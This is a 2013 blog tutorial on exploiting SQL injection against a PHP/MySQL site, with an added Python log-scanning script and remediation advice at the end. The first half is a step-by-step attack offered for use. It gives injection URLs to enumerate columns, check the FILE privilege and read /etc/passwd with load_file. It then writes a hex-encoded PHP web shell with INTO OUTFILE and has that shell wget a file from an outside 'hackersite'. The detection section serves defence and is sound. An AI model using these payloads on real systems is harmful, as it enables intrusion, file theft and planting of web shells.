Monday, April 29, 2013



I wrote this article for educational purposes only, and I am not responsible for any damage caused by what readers do. OK, I assume you have a target with an SQL injection vulnerability. Now follow my instructions. For example, I use "http://target.com/index.php?id=5".

First we need to know the number of columns, so that we know where to inject our code. Use the "order by" command to find it.
 http://target.php?id=5 order by 1,2,3,4,5,6,7,8--
OK, it stops at '8' ... then I use "UNION SELECT" and get the number '5'.

If we want to load or write files, we must check the file privilege. If we see 'Y', it means we have permission to load and write. This is how to check file_priv:
http://target.php?id=-5+UNION+SELECT+1,2,3,4,file_priv,6,7,8+from+mysql.user--
Next we will try to load a file from a directory.
 http://target.php?id=-5+UNION+SELECT+1,2,3,4,load_file('/etc/passwd'),6,7,8--
Or you can convert the path into hex, like this:
 http://target.php?id=-5+UNION+SELECT+1,2,3,4,load_file(0x2f6574632f706173737764),6,7,8--
and we will see the contents of '/etc/passwd'; it contains lines like "root:x:0:0:bla:bla:bla..."

Next we must find the directory. Many sites show the directory in the error page, but some do not. For example, I got this directory: '/var/www/site.com/config.php'.
Now I will try to upload my shell to this directory. I use INTO OUTFILE to write it. This is what I want to upload: <?include($_GET["cmd"]);?> but before I upload it I convert it into hex. It looks like this after converting: 3c3f696e636c75646528245f4745545b22636d64225d293b3f3e
http://target.php?id=-5+UNION+SELECT+1,2,3,4,0x3c3f696e636c75646528245f4745545b22636d64225d293b3f3e,6,7,8+INTO+OUTFILE+'/var/www/site/shell.php'--
And bingo, we have uploaded our shell. Now open the shell:
 http://target.com/shell.php?cmd=wget http://hackersite/devil.txt 
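
From the defender's side, every request in this walkthrough leaves a recognisable trace in the web server's access log. The following Python script is an added example, not part of the original article: it scans constructed log lines (the combined log format, the 192.0.2.x addresses and the rule names are assumptions) for the SQL keywords used above and decodes hex literals so an analyst can see what was read or written.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the requests shown in this article.
RULES = {
    "column_enumeration": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "file_priv_probe": re.compile(r"\bfile_priv\b|\bmysql\.user\b", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "file_write": re.compile(r"\binto\s+(out|dump)file\b", re.I),
}
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2}){4,})\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines for illustration, not real traffic
    '192.0.2.10 - - [29/Apr/2013:10:00:01 +0000] "GET /index.php?id=5 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [29/Apr/2013:10:02:11 +0000] "GET /index.php?id=5+order+by+8-- HTTP/1.1" 200 312',
    '192.0.2.77 - - [29/Apr/2013:10:03:40 +0000] "GET /index.php?id=-5+UNION+SELECT+1,2,3,4,file_priv,6,7,8+from+mysql.user-- HTTP/1.1" 200 5130',
    '192.0.2.77 - - [29/Apr/2013:10:04:02 +0000] "GET /index.php?id=-5+UNION+SELECT+1,2,3,4,load_file(0x2f6574632f706173737764),6,7,8-- HTTP/1.1" 200 6901',
    '192.0.2.77 - - [29/Apr/2013:10:06:15 +0000] "GET /index.php?id=-5+UNION+SELECT+1,2,3,4,0x3c3f696e636c75646528245f4745545b22636d64225d293b3f3e,6,7,8+INTO+OUTFILE+%27/var/www/site/shell.php%27-- HTTP/1.1" 200 298',
]

def inspect(line):
    """Return (matched rule names, decoded hex literals) for one log line."""
    m = REQUEST.search(line)
    if not m:
        return [], []
    query = unquote_plus(m.group(1).partition("?")[2])
    # Replace inline SQL comments and whitespace runs used to split keywords.
    query = re.sub(r"/\*.*?\*/|\s+", " ", query)
    hits = [name for name, rx in RULES.items() if rx.search(query)]
    decoded = [bytes.fromhex(h).decode("utf-8", "replace")
               for h in HEX_LITERAL.findall(query)]
    return hits, decoded

def scan(lines):
    """Return {line_number: (hits, decoded)} for lines matching any rule."""
    findings = {}
    for n, line in enumerate(lines, 1):
        hits, decoded = inspect(line)
        if hits:
            findings[n] = (hits, decoded)
    return findings

if __name__ == "__main__":
    for n, (hits, decoded) in scan(SAMPLE_LOG).items():
        print(n, ",".join(hits), decoded)
```

Keyword matching like this is a triage aid for logs. The fix for the injection itself is parameterised queries, plus a database account for the web application that does not hold the FILE privilege.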
